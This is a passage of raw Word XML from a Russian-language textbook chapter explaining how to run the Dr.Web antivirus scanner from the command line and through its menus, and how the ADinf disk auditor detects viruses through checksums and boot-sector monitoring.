        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>в режиме полноэкранного интерфейса с использованием меню и диалоговых окон;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="117"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>в режиме управления через командную строку.</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Для разового нерегулярного применения более удобен первый режим, но для регулярного применения с целью систематического входного контроля дискет лучше применять второй режим. При использовании второго режима соответствующая команда запуска </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Dr. Web </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>должна быть включена либо в меню пользователя операционной оболочки Norton Commander, либо в специальный командный файл.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Командная строка для запуска </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Dr. Web </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>выглядит следующим образом:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>DrWeb [диск: [путь] ] [ключи]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>где диск:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>X: - логическое устройство жесткого диска или физическое устройство гибкого диска, например F: или А:,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">* - все логические устройства на жестком диске, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>путь - это путь или маска требуемых файлов.</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Наиболее важные ключи:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/AL - диагностика всех файлов на заданном устройстве;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/CU[P] - "лечение" дисков и файлов, удаление найденных вирусов;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Р - удаление вирусов с подтверждением пользователя;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/DL - удаление файлов, корректное лечение которых невозможно;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/НА[уровень] - эвристический анализ файлов и поиск в них неизвестных вирусов, где уровень может принимать значения 0, 1, 2;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">/RР[имя файла] – запись протокола работы в файл (по умолчанию в файл REPORT.WEB); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">/CL - запуск программы в режиме командной строки, при тестировании файлов и системных областей не используется полноэкранный интерфейс; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/QU - выход в DOS сразу после тестирования;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/? – вывод на экран краткой справки.</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Если в командной строке Dr.Web не указано ни одного ключа, то вся и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">формация для текущего запуска будет считываться из файла конфигурации DRWEB.INI, расположенного в том же каталоге, что и файл DRWEB.EXE. Файл конфигурации создается в процессе работы с программой </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Dr. Web </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>с п</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>мощью команды сохранения параметров, необходимых для тестирования.</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Пример 11.28. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Запуск антивирусной программы </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Dr.Web </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>для проверки и леч</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ния диска </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>В:.</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Обнаруженные зараженные файлы будут "вылечены". Проверке подлежат все файлы диска. Если файл "вылечить" не удастся, то программа б</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>дет просить разрешение на его удаление. Для поиска вирусов должен использ</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ваться эвристический уровень анализа 1. Программа должна выполняться тол</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ь</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ко в режиме командной строки с выходом в DOS после завершения тестиров</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ния:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">DrWeb </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>В</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: /AL /CUP /HA1 /QU / CL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>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b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Технология работы с программой Dr. Web в режиме полноэкранного интерфейса.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Для запуска в режиме полноэкранного интерфейса достаточно ввести в командную строку только имя программы. Сразу после загрузки программы начнется тестирование оперативной памяти компьютера, если оно не отключ</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>но предыдущей установкой параметров. Ход тестирования отображается в окне тестирования. После завершения тестирования памяти произойдет остановка. Работу программы можно продолжить, если воспользоваться основным меню, расположенным в верхней строке экрана. Для активизации меню следует нажать клавишу .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Основное меню содержит следующие режимы:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Dr.Web Тест Настройки Дополнения</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>При выборе любого режима открывается соответствующее подменю.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Подменю </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Dr. Web </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>позволяет временно выйти в DOS, получить краткую информацию о программе Dr.Web и о ее авторе или покинуть программу.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Подменю Тест дает возможность выполнить основные операции тестир</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>вания и "лечения" файлов и дисков, а также просмотреть отчеты о произведе</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ных действиях.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Подменю Настройки служит для установки с помощью диалоговых окон параметров настройки программы, установки путей и масок поиска и сохран</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ния параметров в файле конфигурации DRWEB.INI.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Для подключения файлов-дополнений к основной вирусной базе пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">граммы, расширяющих ее возможности, используется режим </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Дополнения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Антивирус-ревизор диска ADinf. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Ревизор ADinf позволяет обнаружить появление любого вируса, включая стелс-вирусы, вирусы-мутанты и неизвес</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>т</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ные на сегодняшний день вирусы. Программа </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ADinf </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>запоминает:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="118"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>информацию о загрузочных секторах;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="118"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>информацию о сбойных кластерах;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="118"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>длину и контрольные суммы файлов;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="118"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>дату и время создания файлов.</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На протяжении всей работы компьютера программа </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ADinf </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>следит за с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">хранностью этих характеристик. В режиме повседневного контроля </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ADinf </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>з</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>пускается автоматически каждый день при первом включении компьютера. Особо отслеживаются вирусоподобные изменения, о которых немедленно в</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ы</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">дается предупреждение. Кроме контроля за целостностью файлов </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ADinf </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>следит за созданием и удалением подкаталогов, созданием, удалением, перемещением и переименованием файлов, появлением новых сбойных кластеров, сохранн</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>стью загрузочных секторов и за многим другим. Перекрываются все возможные места для внедрения вируса в систему.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ADinf </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">проверяет диски, не используя DOS, читая их по секторам прямым обращением в BIOS. Благодаря такому способу проверки </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ADinf </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>обнаруживает маскирующиеся стелс-вирусы и обеспечивает высокую скорость проверки ди</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
